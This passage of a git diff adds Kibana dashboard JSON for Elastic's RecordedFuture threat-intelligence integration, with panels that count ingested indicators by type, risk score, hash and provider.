"yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "de0e531b-dda7-461f-9783-3ab9267d202e" + ], + "layerId": "222b3ad0-2e5d-46a0-ae3d-f6a0b15ac2c8", + "layerType": "data", + "seriesType": "bar", + "xAccessor": "06b603cb-c9fb-493a-9ca4-e6502ca12054" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "File Types [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 19, + "i": "fb5eda7b-02e2-4932-bd84-4213cad36a34", + "w": 15, + "x": 7, + "y": 8 + }, + "panelIndex": "fb5eda7b-02e2-4932-bd84-4213cad36a34", + "title": "Top File Hash Types [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-222b3ad0-2e5d-46a0-ae3d-f6a0b15ac2c8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "222b3ad0-2e5d-46a0-ae3d-f6a0b15ac2c8": { + "columnOrder": [ + "06b603cb-c9fb-493a-9ca4-e6502ca12054", + "de0e531b-dda7-461f-9783-3ab9267d202e" + ], + "columns": { + "06b603cb-c9fb-493a-9ca4-e6502ca12054": { + "dataType": "string", + "isBucketed": true, + "label": "Filters", + "operationType": "filters", + "params": { + "filters": [ + { + "input": { + "language": "kuery", + "query": "\"threat.indicator.file.hash.md5\" : *" + }, + "label": "" + }, + { + "input": { + "language": "kuery", + "query": "\"threat.indicator.file.hash.sha1\" : *" + }, + "label": "" + }, + { + "input": { + "language": "kuery", + "query": "\"threat.indicator.file.hash.sha256\" : *" + }, + "label": "" + }, + { + "input": { + "language": "kuery", + "query": "\"threat.indicator.file.hash.sha384\" : *" + }, + "label": "" + }, + { + "input": { + "language": "kuery", + "query": "\"threat.indicator.file.hash.sha512\" : *" + }, + "label": "" + } + ] + }, + "scale": "ordinal" + }, + "de0e531b-dda7-461f-9783-3ab9267d202e": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "222b3ad0-2e5d-46a0-ae3d-f6a0b15ac2c8", + "layerType": "data", + "legendDisplay": "show", + "legendMaxLines": 5, + "legendSize": "auto", + "metrics": [ + "de0e531b-dda7-461f-9783-3ab9267d202e" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "06b603cb-c9fb-493a-9ca4-e6502ca12054" + ], + "truncateLegend": false + } + ], + "shape": "donut" + } + }, + "title": "File Types [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 19, + "i": "aad523d7-62c8-42c2-ac5d-76705ffe08d4", + "w": 26, + "x": 22, + "y": 8 + }, + "panelIndex": "aad523d7-62c8-42c2-ac5d-76705ffe08d4", + "title": "Top File Hash Types [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-689075f1-c5a1-480f-bb28-0e2f1e9a69b5", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "689075f1-c5a1-480f-bb28-0e2f1e9a69b5": { + "columnOrder": [ + "6661c10a-7e9e-4192-9df6-68639da17c8e", + "79efdebd-bbd4-4971-b889-064a9a9a0420" + ], + "columns": { + "6661c10a-7e9e-4192-9df6-68639da17c8e": { + "dataType": "string", + "isBucketed": true, + "label": "event.risk_score", + "operationType": "range", + "params": { + "maxBars": 499.5, + "parentFormat": { + "id": "range", + "params": { + "replaceInfinity": true, + "template": "arrow_right" + } + }, + "ranges": [ + { + "from": 0, + "label": "0-50", + "to": 50 + }, + { + "from": 50, + "label": "50-60", + "to": 60 + }, + { + "from": 60, + "label": "60-70", + "to": 70 + }, + { + "from": 70, + "label": "70-80", + "to": 80 + }, + { + "from": 80, + "label": "80-90", + "to": 90 + }, + { + "from": 90, + "label": "90-100", + "to": 100 + } + ], + "type": "range" + }, + "scale": "ordinal", + "sourceField": "event.risk_score" + }, + "79efdebd-bbd4-4971-b889-064a9a9a0420": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "79efdebd-bbd4-4971-b889-064a9a9a0420" + ], + "layerId": "689075f1-c5a1-480f-bb28-0e2f1e9a69b5", + "layerType": "data", + "seriesType": "bar", + "xAccessor": "6661c10a-7e9e-4192-9df6-68639da17c8e", + "yConfig": [ + { + "color": "#6092c0", + "forAccessor": "79efdebd-bbd4-4971-b889-064a9a9a0420" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 19, + "i": "92307cac-1296-483d-a825-712e98617f14", + "w": 15, + "x": 7, + "y": 27 + }, + "panelIndex": "92307cac-1296-483d-a825-712e98617f14", + "title": "Indicators by Risk Score [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-222b3ad0-2e5d-46a0-ae3d-f6a0b15ac2c8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "222b3ad0-2e5d-46a0-ae3d-f6a0b15ac2c8": { + "columnOrder": [ + "06b603cb-c9fb-493a-9ca4-e6502ca12054", + "de0e531b-dda7-461f-9783-3ab9267d202e" + ], + "columns": { + "06b603cb-c9fb-493a-9ca4-e6502ca12054": { + "dataType": "string", + "isBucketed": true, + "label": "Top 5 values of threat.indicator.file.hash.md5", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "de0e531b-dda7-461f-9783-3ab9267d202e", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.file.hash.md5" + }, + "de0e531b-dda7-461f-9783-3ab9267d202e": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "222b3ad0-2e5d-46a0-ae3d-f6a0b15ac2c8", + "layerType": "data", + "legendDisplay": "show", + "legendMaxLines": 5, + "legendSize": "auto", + "metrics": [ + "de0e531b-dda7-461f-9783-3ab9267d202e" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "06b603cb-c9fb-493a-9ca4-e6502ca12054" + ], + "truncateLegend": false + } + ], + "shape": "donut" + } + }, + "title": "File Types [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 19, + "i": "2d003143-d3cb-4249-91ae-84ca68d1d8f9", + "w": 26, + "x": 22, + "y": 27 + }, + "panelIndex": "2d003143-d3cb-4249-91ae-84ca68d1d8f9", + "title": "Top File Hashes [Logs RecordedFuture]", + "type": "lens" + } + ], + "timeRestore": false, + "title": "[Logs RecordedFuture] Files", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-29T11:53:29.110Z", + "id": "ti_recordedfuture-554321f4-a649-49da-a5ce-b3dfef1a179b", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5aa8cc45-eafb-423a-be69-330e1c9e915f:indexpattern-datasource-layer-b83c382d-fab9-4e60-a632-475e221cc20c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2e7f1b1e-7c0d-4f0e-b5a3-75f3558b7b23:indexpattern-datasource-layer-85ad73b3-3b76-49f1-ad20-6256b58918f8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "82bffa7f-9796-4815-9256-0cc1d5d89096:indexpattern-datasource-layer-49b7070a-f1d3-46e1-a980-2f6d6d130167", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6d782218-5709-4ead-b236-21ffcc4c207d:indexpattern-datasource-layer-12768311-834b-48d5-8aad-d17d139c2ae5", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "58bb203c-031b-4620-9d66-e4368c65ab52:indexpattern-datasource-layer-12768311-834b-48d5-8aad-d17d139c2ae5", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "fb5eda7b-02e2-4932-bd84-4213cad36a34:indexpattern-datasource-layer-222b3ad0-2e5d-46a0-ae3d-f6a0b15ac2c8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "aad523d7-62c8-42c2-ac5d-76705ffe08d4:indexpattern-datasource-layer-222b3ad0-2e5d-46a0-ae3d-f6a0b15ac2c8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "92307cac-1296-483d-a825-712e98617f14:indexpattern-datasource-layer-689075f1-c5a1-480f-bb28-0e2f1e9a69b5", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2d003143-d3cb-4249-91ae-84ca68d1d8f9:indexpattern-datasource-layer-222b3ad0-2e5d-46a0-ae3d-f6a0b15ac2c8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_b7f6f99b-95d3-44ab-b935-704e307e0dd8:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_6f1ca1c9-a281-458e-bdcf-b21e67546c34:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_50fee1f5-9c14-4620-9c75-f3b91fc6b39f:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "ti_recordedfuture-security-solution-default", + "name": "tag-ref-ti_recordedfuture-security-solution-default", + "type": "tag" + }, + { + "id": "ti_recordedfuture-security-solution-default", + "name": "tag-ref-security-solution-default", + "type": "tag" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/ti_recordedfuture/kibana/dashboard/ti_recordedfuture-57ab05de-cd7e-4779-9201-1e099f7ab23b.json b/packages/ti_recordedfuture/kibana/dashboard/ti_recordedfuture-57ab05de-cd7e-4779-9201-1e099f7ab23b.json new file mode 100644 index 00000000000..e532e6bc73a --- /dev/null +++ b/packages/ti_recordedfuture/kibana/dashboard/ti_recordedfuture-57ab05de-cd7e-4779-9201-1e099f7ab23b.json @@ -0,0 +1,1008 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"4068d8b6-4d83-43a5-8c28-fcb4dabf8de8\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"4068d8b6-4d83-43a5-8c28-fcb4dabf8de8\",\"fieldName\":\"threat.indicator.provider\",\"title\":\"Provider\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"190ee7fa-a38c-44fb-9112-596894954087\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"190ee7fa-a38c-44fb-9112-596894954087\",\"fieldName\":\"threat.indicator.type\",\"title\":\"Indicator Type\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"65b4761b-de0b-499d-83d4-46ea1eb3d3ac\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"65b4761b-de0b-499d-83d4-46ea1eb3d3ac\",\"fieldName\":\"recordedfuture.list\",\"title\":\"Risk List\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}}}" + }, + "description": "Dashboard providing statistics about indicators ingested from the RecordedFuture integration", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "event.dataset", + "negate": false, + "params": [ + "ti_recordedfuture.threat" + ], + "type": "phrases" + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "event.dataset": "ti_recordedfuture.threat" + } + } + ] + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", + "key": "event.kind", + "negate": false, + "params": { + "query": "enrichment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "enrichment" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "params": { + "fontSize": 12, + "markdown": "**Navigation**\n\n**[RecordedFuture Overview (This Page)](/app/dashboards#/view/ti_recordedfuture-57ab05de-cd7e-4779-9201-1e099f7ab23b)** \n[RecordedFuture Files](/app/dashboards#/view/ti_recordedfuture-554321f4-a649-49da-a5ce-b3dfef1a179b) \n[RecordedFuture URLs](/app/dashboards#/view/ti_recordedfuture-ea3dd012-69d8-423d-81b1-2ad9174c75d3) \n\n[Integrations Page](/app/integrations/detail/ti_recordedfuture/overview)\n\n\n**Overview**\n\nThis dashboard is a health overview related to the RecordedFuture integration.\n\nThe dashboard is made to provide general statistics and show the health of the ingestion of indicators from RecordedFuture. \n\nIt shows the ingestion rates and provides a few filters for drilling down to specific indicator types retrieved from RecordedFuture.", + "openLinksInNewTab": false + }, + "title": "Overview Textbox [Logs AbuseCH]", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 39, + "i": "8ca50d85-d4a5-4242-97f7-33445484c437", + "w": 7, + "x": 0, + "y": 0 + }, + "panelIndex": "8ca50d85-d4a5-4242-97f7-33445484c437", + "type": "visualization" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-070f5dbc-7687-4e97-9a57-5542b401c13f", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "070f5dbc-7687-4e97-9a57-5542b401c13f": { + "columnOrder": [ + "1e352b49-3b83-44a6-98fe-8703d30f2517" + ], + "columns": { + "1e352b49-3b83-44a6-98fe-8703d30f2517": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Indicators", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "070f5dbc-7687-4e97-9a57-5542b401c13f", + "layerType": "data", + "metricAccessor": "1e352b49-3b83-44a6-98fe-8703d30f2517" + } + }, + "title": "Total Indicators [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 7, + "i": "f476a486-e306-4906-bf28-30f0c9bd97d8", + "w": 18, + "x": 7, + "y": 0 + }, + "panelIndex": "f476a486-e306-4906-bf28-30f0c9bd97d8", + "title": "Total Indicators [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-1e757dc0-2e6d-4bd2-aa38-7da9133ca960", + "type": "index-pattern" + } + ], + "sharingSavedObjectProps": { + "outcome": "exactMatch", + "sourceId": "ti_abusech-ec1a2c50-3b30-11ec-ae50-2fdf1e96c6a6" + }, + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "1e757dc0-2e6d-4bd2-aa38-7da9133ca960": { + "columnOrder": [ + "66779b74-d127-4249-93e4-b8cd9c39b91f", + "2bbd31c6-4a58-43e5-bab9-de9e7c2d2242" + ], + "columns": { + "2bbd31c6-4a58-43e5-bab9-de9e7c2d2242": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "66779b74-d127-4249-93e4-b8cd9c39b91f": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of threat.indicator.provider", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "2bbd31c6-4a58-43e5-bab9-de9e7c2d2242", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.provider" + } + } + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "2bbd31c6-4a58-43e5-bab9-de9e7c2d2242" + ], + "layerId": "1e757dc0-2e6d-4bd2-aa38-7da9133ca960", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal", + "showGridlines": false, + "splitAccessor": "66779b74-d127-4249-93e4-b8cd9c39b91f" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "bar_horizontal", + "title": "Empty XY chart", + "valueLabels": "show", + "xTitle": "Providers", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + }, + "yTitle": "Count" + } + }, + "title": "Total Indicators per Provider [Logs AbuseCH]", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 19, + "i": "db90358b-9056-45eb-85a3-545631928ee6", + "w": 23, + "x": 25, + "y": 0 + }, + "panelIndex": "db90358b-9056-45eb-85a3-545631928ee6", + "title": "Total Indicators per Provider [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-070f5dbc-7687-4e97-9a57-5542b401c13f", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "070f5dbc-7687-4e97-9a57-5542b401c13f": { + "columnOrder": [ + "1e352b49-3b83-44a6-98fe-8703d30f2517" + ], + "columns": { + "1e352b49-3b83-44a6-98fe-8703d30f2517": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Hash Indicators", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "d0987062-26af-4de8-81d8-15922d36d108", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "ti_recordedfuture.threat" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "ti_recordedfuture.threat" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "threat.indicator.type", + "index": "e7c6d84a-5ade-4c60-9e16-71e8e7a78c2b", + "key": "threat.indicator.type", + "negate": false, + "params": { + "query": "file" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "threat.indicator.type": "file" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "070f5dbc-7687-4e97-9a57-5542b401c13f", + "layerType": "data", + "metricAccessor": "1e352b49-3b83-44a6-98fe-8703d30f2517" + } + }, + "title": "Total Indicators [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 6, + "i": "ed8b8c1e-b34e-44c8-a760-da7fa133cb70", + "w": 9, + "x": 7, + "y": 7 + }, + "panelIndex": "ed8b8c1e-b34e-44c8-a760-da7fa133cb70", + "title": "Total Indicators Hash [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-070f5dbc-7687-4e97-9a57-5542b401c13f", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "070f5dbc-7687-4e97-9a57-5542b401c13f": { + "columnOrder": [ + "1e352b49-3b83-44a6-98fe-8703d30f2517" + ], + "columns": { + "1e352b49-3b83-44a6-98fe-8703d30f2517": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "IP Indicators", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*" + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "threat.indicator.type", + "index": "f983ec32-f684-4057-9ac4-78d6b262a754", + "key": "threat.indicator.type", + "negate": false, + "params": [ + "ipv4-addr", + "ipv6-addr" + ], + "type": "phrases", + "value": [ + "ipv4-addr", + "ipv6-addr" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "threat.indicator.type": "ipv4-addr" + } + }, + { + "match_phrase": { + "threat.indicator.type": "ipv6-addr" + } + } + ] + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "d0987062-26af-4de8-81d8-15922d36d108", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "ti_recordedfuture.threat" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "ti_recordedfuture.threat" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "070f5dbc-7687-4e97-9a57-5542b401c13f", + "layerType": "data", + "metricAccessor": "1e352b49-3b83-44a6-98fe-8703d30f2517" + } + }, + "title": "Total Indicators [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 6, + "i": "53b0c881-386f-4191-ba43-233d69090f78", + "w": 9, + "x": 16, + "y": 7 + }, + "panelIndex": "53b0c881-386f-4191-ba43-233d69090f78", + "title": "Total Indicators IP [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-070f5dbc-7687-4e97-9a57-5542b401c13f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "dc42045c-acfa-4401-98f6-4845bf373eda", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "070f5dbc-7687-4e97-9a57-5542b401c13f": { + "columnOrder": [ + "1e352b49-3b83-44a6-98fe-8703d30f2517" + ], + "columns": { + "1e352b49-3b83-44a6-98fe-8703d30f2517": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "URL Indicators", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "threat.indicator.type", + "index": "dc42045c-acfa-4401-98f6-4845bf373eda", + "key": "threat.indicator.type", + "negate": false, + "params": { + "query": "url" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "threat.indicator.type": "url" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "d0987062-26af-4de8-81d8-15922d36d108", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "ti_recordedfuture.threat" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "ti_recordedfuture.threat" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "070f5dbc-7687-4e97-9a57-5542b401c13f", + "layerType": "data", + "metricAccessor": "1e352b49-3b83-44a6-98fe-8703d30f2517" + } + }, + "title": "Total Indicators [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 6, + "i": "2ed483bb-680b-42c6-bc08-b1a7dd0ed410", + "w": 9, + "x": 7, + "y": 13 + }, + "panelIndex": "2ed483bb-680b-42c6-bc08-b1a7dd0ed410", + "title": "Total Indicators URL [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-070f5dbc-7687-4e97-9a57-5542b401c13f", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "070f5dbc-7687-4e97-9a57-5542b401c13f": { + "columnOrder": [ + "1e352b49-3b83-44a6-98fe-8703d30f2517" + ], + "columns": { + "1e352b49-3b83-44a6-98fe-8703d30f2517": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Domain Indicators", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*" + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "threat.indicator.type", + "index": "6bee0aba-ed41-4a35-ae5f-539e0d317bf1", + "key": "threat.indicator.type", + "negate": false, + "params": { + "query": "domain-name" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "threat.indicator.type": "domain-name" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "d0987062-26af-4de8-81d8-15922d36d108", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "ti_recordedfuture.threat" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "ti_recordedfuture.threat" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "070f5dbc-7687-4e97-9a57-5542b401c13f", + "layerType": "data", + "metricAccessor": "1e352b49-3b83-44a6-98fe-8703d30f2517" + } + }, + "title": "Total Indicators [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 6, + "i": "4839d945-eaa1-4460-b3ff-af2ba457f7ea", + "w": 9, + "x": 16, + "y": 13 + }, + "panelIndex": "4839d945-eaa1-4460-b3ff-af2ba457f7ea", + "title": "Total Indicators Domain [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": 